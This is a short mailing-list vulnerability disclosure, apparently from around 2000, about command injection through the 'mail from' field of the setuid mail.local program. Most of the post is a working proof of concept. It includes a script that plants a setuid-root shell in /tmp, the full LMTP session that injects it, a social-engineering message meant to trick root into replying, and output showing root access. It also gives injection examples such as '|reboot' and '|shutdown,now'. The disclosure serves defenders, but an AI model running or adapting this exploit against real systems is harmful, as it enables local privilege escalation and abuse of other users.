vulnerability in mail.local

[gregory duchemin <c3rb3r () HOTMAIL COM>]

hi,

mail.local is a little setuid root prog designed, like its name suggest, for
local mail delivering.
Used with the -l option, we have an interactive mode in lmtp protocol (
simplified smtp for local mail delivery only )
A weakness exists in the 'mail from' field that allow any local user to
insert a piped shell command that may be executed
by the recipient when he does a reply with the  mail command. A little
social engineering skill should help to root the boxe.
Finally, mail.local shouldn't allow such escape chars even in the mail from
field and the command mail shouldn't allow such
a reply through a pipe.

A space char in the command will finish the string, so either u use a single
command like '|reboot' or use a comma that should
be converted in space by mail.
eg: '|shutdown,now'

Linux 2.4.0 beta Caldera that was freely distributed during the defcon 00 is
vulnerable to this pb.

That looks like the old sendmail bugs

nostalgia
=======

#cat exploit

#!/bin/sh
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh

#id
#id=666(c3rb3r) gid=100(user)
#
#cp exploit /tmp/@hotmail.com
#chmod a+x /tmp/@hotmail.com
#mail.local -l

....

mail from:<|/tmp/@hotmail.com>      U can use many senders to hide the evil
string
rcpt to:<root>
data
Subject:I have a problem

I need higher priviledge on this machine, can u do something for me please ?
thanx.
c3rb3r

.
quit
.....

(now wait for a reply and then, )

#ls /tmp
@hotmail.com
newsh

#/tmp/newsh
#id
#id=0(root) gid=0(root)
#echo 'very nice, thanx a lot'  | mail -s 'thanx' root    // With
thankfully


Have a nice day,


Gregory Duchemin
Security consultant

1001 bd Maisonneuve Ouest, suite 200
Montreal (Quebec) H3A 3C8 CANADA
c3rb3r () hotmail com

_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at
http://profiles.msn.com.